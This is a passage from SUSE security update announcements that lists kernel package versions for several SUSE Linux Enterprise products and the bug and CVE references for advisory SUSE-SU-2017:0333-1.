kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1 SUSE Manager 2.1 (src): kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1 SUSE Linux Enterprise Server 11-SP3-LTSS (src): kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1 SUSE Linux Enterprise Server 11-EXTRA (src): kernel-bigsmp-3.0.101-0.47.86.1, 
kernel-default-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-ppc64-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1 SUSE Linux Enterprise Point of Sale 11-SP3 (src): kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1 SUSE Linux Enterprise Debuginfo 11-SP3 (src): kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
SUSE-SU-2017:0333-1: An update that solves 46 vulnerabilities and has 31 fixes is now available. Category: security (important) Bug References: 1003077,1003925,1004517,1007944,1008645,1008831,1008833,1009443,1010150,1010467,1010501,1010507,1010711,1010716,1011482,1011685,1012422,1012832,1013038,1013531,1013542,1014746,1017710,1021258,835175,839104,863873,874145,896484,908069,914939,922947,927287,940966,950998,954984,956514,958000,960689,963053,967716,968500,969340,971360,971944,978401,978821,979213,979274,979548,979595,979879,979915,980363,980371,980725,981267,983143,983213,984755,986362,986365,986445,986572,989261,991608,991665,992566,993890,993891,994296,994436,994618,994759,995968,997059,999932 CVE References: CVE-2004-0230,CVE-2012-6704,CVE-2013-4312,CVE-2015-1350,CVE-2015-7513,CVE-2015-7833,CVE-2015-8956,CVE-2015-8962,CVE-2015-8964,CVE-2016-0823,CVE-2016-10088,CVE-2016-1583,CVE-2016-2187,CVE-2016-2189,CVE-2016-3841,CVE-2016-4470,CVE-2016-4482,CVE-2016-4485,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4580,CVE-2016-4805,CVE-2016-4913,CVE-2016-4997,CVE-2016-4998,CVE-2016-5244,CVE-2016-5829,CVE-2016-6480,CVE-2016-6828,CVE-2016-7042,CVE-2016-7097,CVE-2016-7117,CVE-2016-7425,CVE-2016-7910,CVE-2016-7911,CVE-2016-7916,CVE-2016-8399,CVE-2016-8632,CVE-2016-8633,CVE-2016-8646,CVE-2016-9555,CVE-2016-9685,CVE-2016-9756,CVE-2016-9793,CVE-2017-5551 Sources used: SUSE Linux Enterprise Server 11-SP2-LTSS (src): kernel-default-3.0.101-0.7.53.1, kernel-ec2-3.0.101-0.7.53.1, kernel-pae-3.0.101-0.7.53.1, kernel-source-3.0.101-0.7.53.1, kernel-syms-3.0.101-0.7.53.1, kernel-trace-3.0.101-0.7.53.1, kernel-xen-3.0.101-0.7.53.1 SUSE Linux Enterprise Debuginfo 11-SP2 (src): kernel-default-3.0.101-0.7.53.1, kernel-ec2-3.0.101-0.7.53.1, kernel-pae-3.0.101-0.7.53.1, kernel-trace-3.0.101-0.7.53.1, kernel-xen-3.0.101-0.7.53.1